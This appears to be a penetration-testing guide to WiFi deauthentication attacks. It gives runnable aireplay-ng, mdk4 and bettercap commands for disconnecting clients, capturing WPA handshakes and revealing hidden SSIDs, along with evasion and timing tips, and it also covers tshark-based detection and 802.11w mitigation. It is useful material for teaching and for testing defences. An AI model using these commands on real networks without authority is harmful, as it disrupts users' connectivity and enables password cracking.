Deauthentication Attacks
#Overview
Deauthentication attacks exploit the unencrypted nature of 802.11 management frames. An attacker can forge a deauthentication frame that appears to come from the AP, causing clients to disconnect. This is used to:
- Force handshake capture — Clients must re-authenticate, generating a new 4-way handshake
- Disconnect specific clients — Targeted denial of service
- Force probe requests — Clients re-scan after disconnecting, revealing hidden SSIDs
- Validate WIDS/WIPS — Test whether the target detects deauth attacks
Management Frame Protection (802.11w / MFP) mitigates this attack on WPA3 and some WPA2 networks, but it's not universally deployed.
#802.11 Deauthentication Frame Mechanics
The deauthentication frame is a management frame (type 0, subtype 12) sent unencrypted, even on WPA/WPA2 networks. The frame contains:
| Field | Value | Notes |
|---|---|---|
| Type | Management (0) | Unencrypted |
| Subtype | Deauthentication (12) | |
| Address 1 | Destination (client or broadcast) | Broadcast = all clients |
| Address 2 | Source (spoofed AP MAC) | |
| Address 3 | BSSID | |
| Reason Code | 1–39 | Most common: 1 (unspecified), 2 (previous auth invalid), 4 (disassociated due to inactivity), 7 (class 3 frame from non-associated station) |
Critical point: The deauthentication frame is sent in the clear. There is no cryptographic protection for management frames unless 802.11w (MFP) is enabled and required.
#Attack Techniques
#Technique 1: Targeted Deauthentication
Disconnect a specific client from the AP.
# Deauth a specific client (5 frames)
sudo aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
# Continuous deauth (until Ctrl+C)
sudo aireplay-ng -0 0 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
# Deauth with reason code
sudo aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> -F wlan0mon
BASH
#Technique 2: Broadcast Deauthentication
Disconnect all clients from the AP. Use with extreme caution — this affects every connected device.
# Broadcast deauth (10 frames)
sudo aireplay-ng -0 10 -a <AP_MAC> wlan0mon
# Continuous broadcast deauth
sudo aireplay-ng -0 0 -a <AP_MAC> wlan0mon
BASH
#Technique 3: Deauth with airodump-ng (Handshake Capture)
The most common pattern — deauth + simultaneous capture.
# Terminal 1: Start capture
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write handshake
# Terminal 2: Deauth to force handshake
sudo aireplay-ng -0 5 -a <AP_MAC> wlan0mon
# Watch for "WPA handshake: <AP_MAC>" in airodump-ng
BASH
#Technique 4: MDK4/MDK3 Deauthentication
MDK4 (successor to MDK3) provides more deauthentication options and evasion techniques.
# MDK4 deauthentication
sudo mdk4 wlan0mon d -b <AP_MAC>
# Deauth with random source MAC (harder to detect)
sudo mdk4 wlan0mon d -b <AP_MAC> -s 1000
# Deauth all APs in range (extremely noisy)
sudo mdk4 wlan0mon d -c <channel_list>
BASH
#Technique 5: bettercap Deauthentication
# Start bettercap
sudo bettercap -iface wlan0mon
# Set WiFi recon mode
net.probe on
net.recon on
# Deauth a specific client
wifi.deauth <CLIENT_MAC>
# Deauth all clients on an AP
wifi.deauth <AP_MAC>
BASH
#Technique 6: Hidden SSID Revelation
Deauth forces clients to re-scan, revealing hidden SSIDs in probe requests.
# Terminal 1: Capture probe requests
sudo airodump-ng wlan0mon --channel <CH> --write hidden-ssid
# Terminal 2: Deauth clients
sudo aireplay-ng -0 5 -a <AP_MAC> wlan0mon
# Watch for the SSID in probe requests and association frames
# Hidden SSIDs appear as "<length: 0>" until a client connects
BASH
#Management Frame Protection (802.11w / MFP)
802.11w adds cryptographic protection to management frames, preventing deauthentication attacks.
#Detecting MFP
# Check beacon frames for MFP capability
iw dev wlan0mon scan | grep -A5 "MFP"
# Or with tshark
tshark -r capture.cap -Y 'wlan.fc.type_subtype == 0x0080' \
-T fields -e wlan.rsn.mfp.required -e wlan.rsn.mfp.capable
# MFP values:
# 0 = not capable
# 1 = capable but not required (optional)
# 2 = required (mandatory)
BASH
#MFP Impact on Attacks
| MFP Setting | Deauth Works? | Alternative |
|---|---|---|
| MFP disabled | Yes | Standard deauth |
| MFP optional | Yes (send unencrypted) | Most clients accept unencrypted deauth |
| MFP required | No | Use PMKID capture, evil twin, or client-side attacks |
When MFP is required, deauthentication frames are ignored by clients. Alternative approaches:
- PMKID capture — See PMKID Attack
- Evil twin — See Evil Twin & Rogue AP
- Wait for natural reconnection — Client eventually roams or reconnects
- Client-side attack — Phishing, malicious update, etc.
#Detection and Monitoring
#Detecting Deauth Attacks with tshark
# Show all deauthentication frames
tshark -r capture.cap -Y 'wlan.fc.type_subtype == 0x000C' \
-T fields -e frame.time -e wlan.sa -e wlan.da -e wlan.bssid -e wlan.fixed.reason_code
# Count deauth frames by source
tshark -r capture.cap -Y 'wlan.fc.type_subtype == 0x000C' \
-T fields -e wlan.sa | sort | uniq -c | sort -rn
# Detect rapid deauth bursts (attack indicator)
tshark -r capture.cap -Y 'wlan.fc.type_subtype == 0x000C' \
-T fields -e frame.time_epoch | awk '{print int($1)}' | uniq -c | awk '$1 > 10'
BASH
#Detecting with airodump-ng
# airodump-ng shows deauth frames in the "Lost" column
# A rapidly increasing "Lost" count indicates a deauth attack
sudo airodump-ng wlan0mon --channel <CH>
BASH
#WIDS/WIPS Detection
Enterprise wireless intrusion detection systems detect deauth attacks by:
- Deauth frame rate analysis — Normal clients deauth rarely; bursts indicate attacks
- Source MAC analysis — Spoofed AP MACs that don't match known APs
- Sequence number analysis — Deauth frames with out-of-order sequence numbers
- RSSI comparison — Deauth frames from a different physical location than the AP
#Common Pitfalls
- Deauth doesn't work (no handshake captured) — MFP may be required. Try PMKID capture instead.
- Client reconnects immediately — This is expected. The goal is to capture the reconnection handshake, not to keep the client offline.
- No visible clients — No clients means no handshake. Use PMKID attack (no client needed) or wait for clients to connect.
- Wrong channel — Always lock monitor mode to the target channel before deauthing.
- Adapter injection failure — Not all adapters support frame injection. Test with
aireplay-ng -9 wlan0mon.
#OPSEC Considerations
- Deauth frames are highly visible to WIDS/WIPS
- Broadcast deauth disconnects ALL clients — extremely noisy
- Targeted deauth is less visible but still detectable
- Sequence numbers in forged frames may not match the AP's actual sequence — a detection heuristic
- Deauth bursts create timestamps and patterns that can identify the attacker's physical location
- Time deauth attacks during high-traffic periods for better cover
- Use the minimum number of frames needed (5 is usually sufficient for handshake capture)
#Cross-References
- WPA/WPA2 Cracking — Deauth is primarily used to capture handshakes
- PMKID Attack — Stealthier alternative (no deauth needed)
- Evil Twin & Rogue AP — Alternative when deauth fails (MFP required)
- 01 - Pre-Foothold — Passive survey before deauth
#Tool References
| Tool | Purpose | Link |
|---|---|---|
| aireplay-ng | Deauth frame injection | https://www.aircrack-ng.org/ |
| mdk4 | Advanced deauth and WiFi attacks | https://github.com/aircrack-ng/mdk4 |
| bettercap | WiFi recon and deauth | https://www.bettercap.org/ |
| tshark | Packet analysis and detection | https://www.wireshark.org/ |
| airodump-ng | Capture and monitor | https://www.aircrack-ng.org/ |